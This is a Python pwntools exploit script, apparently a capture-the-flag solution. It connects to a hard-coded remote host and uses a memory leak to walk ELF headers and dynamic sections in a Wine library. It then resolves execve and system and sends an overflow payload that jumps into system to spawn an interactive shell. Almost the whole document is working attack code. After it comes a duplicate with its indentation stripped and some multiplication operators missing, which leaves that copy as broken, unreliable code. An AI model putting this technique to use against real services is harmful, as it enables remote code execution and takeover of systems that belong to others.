kokjo/doit_drunk.py

## doit_drunk.py
from pwn import *
from ctypes import sizeof
ed = elf.datatypes

r = remote("146.148.79.13", 55173)
r.sendline(str(3338240).ljust(80, "\x00")+p32(0x401000))
r.recvrepeat(1)

@MemLeak
def leak(addr):
    addr %= 2**32
    if addr > 0x7fffffff:
        addr = -(2**32 - addr)
    r.sendline(str(addr).ljust(16, "A"))
    data = r.recvrepeat(0.5)
    # get rid of windows newline.
    return data.replace("\r\n", "\n")

ptr = 0x7b800000

#find .dynamic
phdr = ptr + leak.field(ptr, ed.Elf32_Ehdr.e_phoff)
for i in range(10):
    phdr += sizeof(ed.Elf32_Phdr)
    typ = leak.field(phdr, ed.Elf32_Phdr.p_type)
    addr = leak.field(phdr, ed.Elf32_Phdr.p_vaddr)
    if(typ == 2):
        break

#find .jmprel, .strtab, and .symtab
dynamic = []
while True:
    typ = leak.d(addr)
    val = leak.d(addr+4)
    dynamic.append((typ, val))
    addr += 8
    if typ == 5:
        strtab = val
    if typ == 6:
        symtab = val
    if typ == 0x17:
        jmprel = val
    if typ == 0:
        break

#leak all symbols of the wine libarry.
symbols = {}
while True:
    offset = leak.d(jmprel)
    info = leak.d(jmprel+4)
    symidx = info >> 8
    sym = symtab + symidx*sizeof(ed.Elf32_Sym)
    name = leak.field(sym, ed.Elf32_Sym.st_name)
    name = leak.s(strtab+name)
    addr = leak.d(offset)
    jmprel += 8
    symbols[name] = addr
    if name == "execve":
        break

# have execve(a pointer to libc) want address of system
d = DynELF(leak, symbols["execve"]-175*0x1000)
system = d.lookup("system")

#verify that it begins with "push reg"
print disasm(leak.n(system, 10))

#unaligned jump to system symbol, causing it to use its 2. arg as its first.
r.sendline(str(0x401000).ljust(16)+p32(0x41424344)*8+"sh\x00\x00"+p32(system+1)+"AAAA"*500)
r.recvrepeat(0.5)
r.interactive()
	from pwn import *
	from ctypes import sizeof
	ed = elf.datatypes

	r = remote("146.148.79.13", 55173)
	r.sendline(str(3338240).ljust(80, "\x00")+p32(0x401000))
	r.recvrepeat(1)

	@MemLeak
	def leak(addr):
	addr %= 2**32
	if addr > 0x7fffffff:
	addr = -(2**32 - addr)
	r.sendline(str(addr).ljust(16, "A"))
	data = r.recvrepeat(0.5)
	# get rid of windows newline.
	return data.replace("\r\n", "\n")

	ptr = 0x7b800000

	#find .dynamic
	phdr = ptr + leak.field(ptr, ed.Elf32_Ehdr.e_phoff)
	for i in range(10):
	phdr += sizeof(ed.Elf32_Phdr)
	typ = leak.field(phdr, ed.Elf32_Phdr.p_type)
	addr = leak.field(phdr, ed.Elf32_Phdr.p_vaddr)
	if(typ == 2):
	break

	#find .jmprel, .strtab, and .symtab
	dynamic = []
	while True:
	typ = leak.d(addr)
	val = leak.d(addr+4)
	dynamic.append((typ, val))
	addr += 8
	if typ == 5:
	strtab = val
	if typ == 6:
	symtab = val
	if typ == 0x17:
	jmprel = val
	if typ == 0:
	break

	#leak all symbols of the wine libarry.
	symbols = {}
	while True:
	offset = leak.d(jmprel)
	info = leak.d(jmprel+4)
	symidx = info >> 8
	sym = symtab + symidx*sizeof(ed.Elf32_Sym)
	name = leak.field(sym, ed.Elf32_Sym.st_name)
	name = leak.s(strtab+name)
	addr = leak.d(offset)
	jmprel += 8
	symbols[name] = addr
	if name == "execve":
	break

	# have execve(a pointer to libc) want address of system
	d = DynELF(leak, symbols["execve"]-175*0x1000)
	system = d.lookup("system")

	#verify that it begins with "push reg"
	print disasm(leak.n(system, 10))

	#unaligned jump to system symbol, causing it to use its 2. arg as its first.
	r.sendline(str(0x401000).ljust(16)+p32(0x41424344)8+"sh\x00\x00"+p32(system+1)+"AAAA"500)
	r.recvrepeat(0.5)
	r.interactive()